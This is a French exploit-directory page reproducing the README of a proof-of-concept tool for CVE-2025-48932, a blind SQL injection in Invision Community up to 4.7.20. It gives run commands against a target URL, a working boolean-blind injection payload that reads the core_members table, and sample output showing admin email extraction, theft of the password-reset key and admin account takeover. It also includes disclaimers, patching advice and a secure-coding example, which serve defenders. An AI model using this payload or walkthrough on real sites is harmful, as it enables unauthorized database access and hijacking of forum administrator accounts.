Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-48932---exploit — Preuve de concept d'exploit pour CVE-2025-48932, une injection SQL dans Invision Community <= 4.7.20. Extrait les identifiants administrateur via une injection SQL aveugle et la clé de réinitialisation de mot de passe pour une prise de contrôle de compte. | Kitploit
Outils/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

Preuve de concept d'exploit pour CVE-2025-48932, une injection SQL dans Invision Community <= 4.7.20. Extrait les identifiants administrateur via une injection SQL aveugle et la clé de réinitialisation de mot de passe pour une prise de contrôle de compte.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
2il y a 9 moisPas encore vérifié

Exploit d'injection SQL Invision Community (CVE-2025-48932)

Python Version License CVE

Un exploit de preuve de concept démontrant une vulnérabilité d'injection SQL dans Invision Community versions <= 4.7.20.

⚠️ Avertissement

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

  • L'accès non autorisé aux systèmes informatiques est ILLÉGAL
  • Utilisez cet outil uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite de tester
  • L'auteur N'EST PAS RESPONSABLE de toute utilisation abusive ou des dommages causés par cet outil
  • Ceci est destiné uniquement aux chercheurs en sécurité, aux testeurs d'intrusion et à des fins éducatives

📋 Table des matières

  • Description de la vulnérabilité
  • Prérequis
  • Installation
  • Utilisation
  • Fonctionnement
  • Atténuation
  • Crédits
  • Références

🔍 Description de la vulnérabilité

Identifiant CVE : CVE-2025-48932
Sévérité : Élevée
Score CVSS : À déterminer
Versions affectées : Invision Community versions 4.x antérieures à 4.7.21

La vulnérabilité existe dans le script /applications/calendar/modules/front/calendar/view.php. Les entrées utilisateur passées via le paramètre de requête location dans la méthode IPS\calendar\modules\front\calendar\view::search() ne sont pas correctement nettoyées avant d'être utilisées dans des requêtes SQL.

Cela permet à des attaquants distants non authentifiés de :

  • Extraire des données sensibles de la base de données
  • Lire les identifiants administrateur
  • Potentiellement prendre le contrôle du compte administrateur

Prérequis pour l'exploitation :

  • L'application Calendrier doit être installée
  • La fonctionnalité de géolocalisation (comme Google Maps) doit être configurée

Remarque : Alors que les vulnérabilités d'injection SQL dans Invision Community versions 4.x < 4.7.18 pouvaient conduire à une prise de contrôle du compte administrateur et à une exécution de code à distance (RCE) en réinitialisant le mot de passe administrateur, la version 4.7.18 a introduit une nouvelle clé de chiffrement de sécurité dans le mécanisme de réinitialisation de mot de passe, rendant ce vecteur d'attaque plus difficile.

📦 Prérequis

  • Python 3.7 ou supérieur
  • pip (gestionnaire de paquets Python)
  • Connexion Internet
  • Système cible exécutant Invision Community <= 4.7.20 avec :
    • Application Calendrier installée
    • Fonctionnalité de géolocalisation configurée

🚀 Installation

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/yourusername/invision-sqli-exploit.git
    cd invision-sqli-exploit
    
  2. Installez les dépendances :

    root@kitploit:~
    pip install -r requirements.txt
    

💻 Utilisation

Utilisation de base

root@kitploit:~
python invision-sqli-exploit.py -u http://target.com/forum/

Mode verbose (pour le débogage)

root@kitploit:~
python invision-sqli-exploit.py -u https://example.com/community/ -v

Arguments de la ligne de commande

Exemple de sortie

root@kitploit:~
==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Target: http://example.com/forum/
==================================================

[*] Fetching CSRF token...
[+] CSRF token found: abc123def456...
[*] Step 1: Extracting admin email address...
[*] Extracting data: [email protected]
[+] Admin email: [email protected]

[!] Step 2: Manual action required!

Please follow these steps:
1. Navigate to: http://example.com/forum/index.php?/lostpassword/
2. Request a password reset using email: [email protected]
3. Press ENTER when done...

[*] Step 3: Extracting password reset validation key...
[*] Extracting data: xyz789abc123...
[+] Reset key: xyz789abc123...
[*] Step 4: Resetting admin password...

==================================================
[+] EXPLOITATION SUCCESSFUL!
==================================================

Admin credentials:
  Email:    [email protected]
  Password: Pwned1721234567

You can now login at: http://example.com/forum/index.php?/login/

🔬 Fonctionnement

L'exploit fonctionne en quatre étapes principales :

1. Extraction du jeton CSRF

Le script récupère d'abord un jeton CSRF du site web cible, requis pour les requêtes suivantes.

2. Injection SQL aveugle basée sur des booléens

En utilisant un algorithme de recherche binaire, l'exploit extrait les données caractère par caractère de la base de données :

  • Teste chaque caractère à l'aide de requêtes SQL conditionnelles
  • Utilise la fonction RLIKE avec des motifs regex pour détecter les conditions vraies/fausses
  • Les messages d'erreur indiquent les conditions réussies

3. Extraction de l'email administrateur

Interroge la table core_members pour extraire l'adresse email de l'administrateur.

4. Exploitation de la réinitialisation du mot de passe

  • L'attaquant initie manuellement une réinitialisation de mot de passe pour le compte administrateur
  • L'exploit extrait la clé de validation de réinitialisation de mot de passe de la base de données
  • Utilise la clé de validation pour réinitialiser le mot de passe administrateur sans accès à l'email

Détails techniques

Point d'injection :

root@kitploit:~
location parameter → calendar/view.php → search() method

Exemple de payload :

root@kitploit:~
'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#

Technique d'exploitation : Injection SQL aveugle basée sur des booléens utilisant une recherche binaire pour une extraction efficace des données.

🛡️ Atténuation

Pour les utilisateurs

Mesures immédiates :

  1. Mettre à niveau vers la version 4.7.21 ou ultérieure - Cette version corrige la vulnérabilité
  2. Désactiver l'application Calendrier si elle n'est pas utilisée
  3. Surveiller les journaux d'accès pour détecter une activité suspecte
  4. Vérifier les comptes administrateur pour un accès non autorisé

Pour les développeurs

Pratiques de codage sécurisé :

  1. Utiliser des requêtes paramétrées/instructions préparées - Ne jamais concaténer les entrées utilisateur dans des requêtes SQL
  2. Validation des entrées - Valider et nettoyer toutes les entrées utilisateur
  3. Principe du moindre privilège - Les utilisateurs de la base de données doivent avoir les permissions minimales requises
  4. Pare-feu d'application web (WAF) - Déployer des règles WAF pour détecter les tentatives d'injection SQL
  5. Audits de sécurité réguliers - Effectuer des revues de code et des tests d'intrusion périodiques

Exemple de code sécurisé :

root@kitploit:~
// Vulnerable code
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// Secure code
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);

📅 Chronologie de divulgation

DateÉvénement
16 mai 2025Fournisseur notifié
27 mai 2025Version 4.7.21 publiée
28 mai 2025Identifiant CVE demandé

👏 Crédits

Développeur :

  • nanda

Remarque : Ceci est une implémentation indépendante basée sur les informations de vulnérabilité divulguées publiquement (CVE-2025-48932)

📚 Références

  • Détails de CVE-2025-48932
  • Site officiel d'Invision Community
  • EDB-ID: 52383

📝 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

🤝 Contribution

Les contributions sont les bienvenues ! N'hésitez pas à soumettre une Pull Request. Pour des changements majeurs, veuillez d'abord ouvrir une issue pour discuter de ce que vous souhaitez modifier.

⚖️ Avis légal

Cet outil est distribué sous la licence MIT. En utilisant ce logiciel, vous acceptez :

  1. L'utiliser uniquement à des fins de tests légaux et autorisés
  2. Assumer l'entière responsabilité de vos actions
  3. Ne pas tenir l'auteur responsable de toute utilisation abusive ou des dommages
  4. Vous conformer à toutes les lois et réglementations applicables

Rappel : L'accès non autorisé aux systèmes informatiques est un crime dans la plupart des juridictions et peut entraîner de graves conséquences juridiques.


Si vous découvrez une vulnérabilité de sécurité, veuillez la divulguer de manière responsable au fournisseur avant de la rendre publique.

Télécharger l’outil
ArgumentDescriptionRequis
-u, --urlURL de base d'Invision Community cibleOui
-v, --verboseActiver la sortie verbose pour le débogageNon
-h, --helpAfficher le message d'aide et quitterNon
28 mai 2025CVE-2025-48932 attribué
23 juillet 2025Divulgation publique